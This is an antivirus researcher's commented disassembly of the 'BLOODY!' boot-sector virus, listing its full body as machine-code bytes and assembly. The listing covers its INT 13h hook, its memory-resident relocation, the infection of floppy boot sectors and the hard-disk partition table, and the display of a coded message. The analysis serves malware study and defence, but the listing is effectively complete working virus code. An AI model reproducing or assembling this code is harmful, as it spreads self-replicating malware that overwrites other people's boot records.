; 	BLOODY! virus
;
;	Discovered an commented by  Ferenc Leitold
; 			      Hungarian VirusBuster Team
;                              Address: 1399 Budapest
;                                       P.O. box 701/349
;                                          HUNGARY


217D:0100  2EFF2E177C     JMP    Far CS:[7C17]
217D:0105  E9B500         JMP    01BD		; Jump to main entry point

217D:0108  00        	  db	 0		; Counter
217D:0109  00        	  db	 0
217D:010A  00             db	 0		; Flag:
						;      00 : floppy
						;      80 : hard disk
217D:010B  00             db	 0

217D:010C  A100F0         MOV    AX,[F000]

217D:010F  0301809F       DW	 0103H,9F80H	; Entry point at TOP

217D:0113  007C0000	  DW	 7C00H,0000H	; Address of orig. boot

217D:0117  057C0000       DW	 7C05H,0000H

217D:011B  00000000	  DW	 0000H,0000H	; original INT13 vector

;************************ INT13 entry point *****************************

217D:011F  80FC02         CMP    AH,02        	; Check parameters
217D:0122  720D           JC     0131
217D:0124  80FC04         CMP    AH,04
217D:0127  7308           JNC    0131
217D:0129  80FA80         CMP    DL,80
217D:012C  7303           JNC    0131
217D:012E  E80500         CALL   0136           ; Call, if AH=2,3 & DL!=80
217D:0131  2EFF2E0B00     JMP    Far CS:[000B]	; Jump to original INT13

217D:0136  50             PUSH   AX		; Save registers
217D:0137  53             PUSH   BX
217D:0138  51             PUSH   CX
217D:0139  52             PUSH   DX
217D:013A  06             PUSH   ES
217D:013B  1E             PUSH   DS
217D:013C  56             PUSH   SI
217D:013D  57             PUSH   DI

217D:013E  0E             PUSH   CS		; Set DS,ES to CS
217D:013F  1F             POP    DS
217D:0140  0E             PUSH   CS
217D:0141  07             POP    ES

217D:0142  BE0200         MOV    SI,0002	; 2 probe

217D:0145  33C0           XOR    AX,AX		; Reset drive
217D:0147  9C             PUSHF
217D:0148  FF1E0B00       CALL   Far [000B]	; Call INT13
217D:014C  B80102         MOV    AX,0201	; Read boot sector of floppy
217D:014F  BB0002         MOV    BX,0200
217D:0152  B90100         MOV    CX,0001
217D:0155  32F6           XOR    DH,DH
217D:0157  9C             PUSHF
217D:0158  FF1E0B00       CALL   Far [000B]	; Call INT13
217D:015C  7305           JNC    0163
217D:015E  4E             DEC    SI		; If error next probe
217D:015F  75E4           JNZ    0145
217D:0161  EB2E           JMP    0191		; Jump, if 2 bad probes was

217D:0163  33F6           XOR    SI,SI  	; Check boot sector, if
217D:0165  BF0002         MOV    DI,0200	;  if infected yet
217D:0168  B90300         MOV    CX,0003
217D:016B  FC             CLD
217D:016C  F3A7           REP    CMPSW
217D:016E  7421           JZ     0191		; Jump, if already infected

217D:0170  B80103         MOV    AX,0301	; Write orig. boot sector
217D:0173  BB0002         MOV    BX,0200
217D:0176  B90300         MOV    CX,0003	; cyl: 0  sect: 3
217D:0179  B601           MOV    DH,01		; head: 1
217D:017B  9C             PUSHF
217D:017C  FF1E0B00       CALL   Far [000B]	; Call INT13
217D:0180  720F           JC     0191

217D:0182  B80103         MOV    AX,0301	; Write infected boot sector
217D:0185  33DB           XOR    BX,BX
217D:0187  B90100         MOV    CX,0001	; cyl:0 sect:1
217D:018A  32F6           XOR    DH,DH		; head: 0
217D:018C  9C             PUSHF
217D:018D  FF1E0B00       CALL   Far [000B]

217D:0191  5F             POP    DI		; Restore registers
217D:0192  5E             POP    SI
217D:0193  1F             POP    DS
217D:0194  07             POP    ES
217D:0195  5A             POP    DX
217D:0196  59             POP    CX
217D:0197  5B             POP    BX
217D:0198  58             POP    AX
217D:0199  C3             RET

217D:019A  1D1D1D1A3737         ; Coded text:
217D:01A0  37373737557B  	; "\r\r\r\n      Bloody! Jun. 4, 1989\r\r\r\n"
217D:01A6  7878736E3637
217D:01AC  5D6279393723
217D:01B2  3B37262E2F2E
217D:01B8  1D1D1D1A00

;************************** Main entry point *******************************

217D:01BD  33C0           XOR    AX,AX
217D:01BF  8ED8           MOV    DS,AX
217D:01C1  FA             CLI
217D:01C2  8ED0           MOV    SS,AX
217D:01C4  BC007C         MOV    SP,7C00
217D:01C7  FB             STI

217D:01C8  A14C00         MOV    AX,[004C]	; Save orig. INT13 vector
217D:01CB  A30B7C         MOV    [7C0B],AX
217D:01CE  A14E00         MOV    AX,[004E]
217D:01D1  A30D7C         MOV    [7C0D],AX

217D:01D4  A11304         MOV    AX,[0413]	; Decrease memory by 2KB
217D:01D7  48             DEC    AX
217D:01D8  48             DEC    AX
217D:01D9  A31304         MOV    [0413],AX

217D:01DC  B106           MOV    CL,06		; Calculate segment
217D:01DE  D3E0           SHL    AX,CL
217D:01E0  A3117C         MOV    [7C11],AX



217D:01E3  A34E00         MOV    [004E],AX	; Set new INT13 vector
217D:01E6  8EC0           MOV    ES,AX
217D:01E8  B81F00         MOV    AX,001F
217D:01EB  A34C00         MOV    [004C],AX

217D:01EE  C7060F7C0301   MOV    [7C0F],0103	; Set JMP argument points
						;  to TOP

217D:01F4  BE007C         MOV    SI,7C00	; Copy itself to TOP
217D:01F7  33FF           XOR    DI,DI
217D:01F9  B90001         MOV    CX,0100
217D:01FC  FC             CLD
217D:01FD  F3A5           REP    MOVSW
217D:01FF  FF2E0F7C       JMP    Far [7C0F]	; Jmp to TOP

TOP :0203  33C0           XOR    AX,AX		; Reset drive
TOP :0205  CD13           INT    13

TOP :0207  0E             PUSH   CS       	; Set registers to load
TOP :0208  1F             POP    DS		;  original sector
TOP :0209  33C0           XOR    AX,AX
TOP :020B  8EC0           MOV    ES,AX
TOP :020D  B80102         MOV    AX,0201
TOP :0210  BB007C         MOV    BX,7C00
TOP :0213  803E0A0000     CMP    [000A],00	; Check, if it is floppy ?
TOP :0218  7435           JZ     024F		; Jump, if floppy

						; if hard disk, load
						;  orig. part. table
TOP :021A  B90600         MOV    CX,0006	; cyl.: 0 sect.: 6
TOP :021D  BA8000         MOV    DX,0080	; head: 0
TOP :0220  CD13           INT    13
TOP :0222  0E             PUSH   CS
TOP :0223  07             POP    ES
TOP :0224  FE060800       INC    B/[0008]	; Increase counter
TOP :0228  803E080080     CMP    [0008],80
TOP :022D  721E           JC     024D		; If counter < 128 -> no text
TOP :022F  C60608007A     MOV    [0008],7A
TOP :0234  FC             CLD

TOP :0235  BE9A00         MOV    SI,009A	; Write coded text via BIOS
TOP :0238  AC             LODSB
TOP :0239  3C00           CMP    AL,00
TOP :023B  740C           JZ     0249
TOP :023D  32060300       XOR    AL,[0003]
TOP :0241  B40E           MOV    AH,0E
TOP :0243  B700           MOV    BH,00
TOP :0245  CD10           INT    10
TOP :0247  EBEF           JMP    0238

TOP :0249  B400           MOV    AH,00		; Wait for keystroke
TOP :024B  CD16           INT    16
TOP :024D  EB54           JMP    02A3

						; if floppy
TOP :024F  B90300         MOV    CX,0003	; read orig. boot sector
TOP :0252  BA0001         MOV    DX,0100	; cyl: 0 hd: 1 sect: 3
TOP :0255  CD13           INT    13

TOP :0257  0E             PUSH   CS
TOP :0258  07             POP    ES
TOP :0259  721D           JC     0278		; Jump, if error occured


TOP :025B  B80102         MOV    AX,0201	; Load part. table of
TOP :025E  BB0002         MOV    BX,0200	;  1st hard disk
TOP :0261  B90100         MOV    CX,0001
TOP :0264  BA8000         MOV    DX,0080
TOP :0267  CD13           INT    13
TOP :0269  720D           JC     0278		; Jump, if error occured

TOP :026B  BE0002         MOV    SI,0200	; Check 1st 3 word
TOP :026E  33FF           XOR    DI,DI
TOP :0270  B90300         MOV    CX,0003
TOP :0273  FC             CLD
TOP :0274  F3A7           REP    CMPSW
TOP :0276  750E           JNZ    0286

						; If infected yet
TOP :0278  C6060A0000     MOV    [000A],00 	; Set Flag to 0
TOP :027D  C606080000     MOV    [0008],00	; Reset counter
TOP :0282  FF2E1300       JMP    Far [0013]	; Jump to orig. boot

TOP :0286  B80103         MOV    AX,0301	; Write orig. part. table
TOP :0289  BB0002         MOV    BX,0200
TOP :028C  B90600         MOV    CX,0006        ; cyl: 0 sect: 6 hd: 0
TOP :028F  CD13           INT    13
TOP :0291  72E5           JC     0278

TOP :0293  BEBE03         MOV    SI,03BE	; Copy partition info
TOP :0296  BFBE01         MOV    DI,01BE	;  after virus body
TOP :0299  B92101         MOV    CX,0121
TOP :029C  F3A5           REP    MOVSW
TOP :029E  C6060A0001     MOV    [000A],01

TOP :02A3  B80103         MOV    AX,0301	; Write boot sector or
						;  partition table with
						;  increased counter
TOP :02A6  33DB           XOR    BX,BX
TOP :02A8  B90100         MOV    CX,0001
TOP :02AB  CD13           INT    13


TOP :02AD  BEBE04         MOV    SI,04BE	; Clear area of partition
TOP :02B0  BFBE01         MOV    DI,01BE	;  info
TOP :02B3  B92000         MOV    CX,0020
TOP :02B6  F3A5           REP    MOVSW
TOP :02B8  EBBE           JMP    0278		; Set parameters &
						;  jump to orig. boot
TOP :02BA  DE07           ESC    30,[BX]
TOP :02BC  DF07           ESC    38,[BX]
TOP :02BE  0000           ADD    [BX+SI],AL
TOP :02C0  0000           ADD    [BX+SI],AL
TOP :02C2  0000           ADD    [BX+SI],AL
TOP :02C4  0000           ADD    [BX+SI],AL
TOP :02C6  0000           ADD    [BX+SI],AL
TOP :02C8  0000           ADD    [BX+SI],AL
TOP :02CA  0000           ADD    [BX+SI],AL
TOP :02CC  0000           ADD    [BX+SI],AL
TOP :02CE  0000           ADD    [BX+SI],AL
TOP :02D0  0000           ADD    [BX+SI],AL
TOP :02D2  0000           ADD    [BX+SI],AL
TOP :02D4  0000           ADD    [BX+SI],AL
TOP :02D6  0000           ADD    [BX+SI],AL
TOP :02D8  0000           ADD    [BX+SI],AL
TOP :02DA  0000           ADD    [BX+SI],AL
TOP :02DC  0000           ADD    [BX+SI],AL
TOP :02DE  0000           ADD    [BX+SI],AL
TOP :02E0  0000           ADD    [BX+SI],AL
TOP :02E2  0000           ADD    [BX+SI],AL
TOP :02E4  0000           ADD    [BX+SI],AL
TOP :02E6  0000           ADD    [BX+SI],AL
TOP :02E8  0000           ADD    [BX+SI],AL
TOP :02EA  0000           ADD    [BX+SI],AL
TOP :02EC  0000           ADD    [BX+SI],AL
TOP :02EE  0000           ADD    [BX+SI],AL
TOP :02F0  0000           ADD    [BX+SI],AL
TOP :02F2  0000           ADD    [BX+SI],AL
TOP :02F4  0000           ADD    [BX+SI],AL
TOP :02F6  0000           ADD    [BX+SI],AL
TOP :02F8  0000           ADD    [BX+SI],AL
TOP :02FA  0000           ADD    [BX+SI],AL
TOP :02FC  0000           ADD    [BX+SI],AL
TOP :02FE  55             PUSH   BP
TOP :02FF  AA             STOSB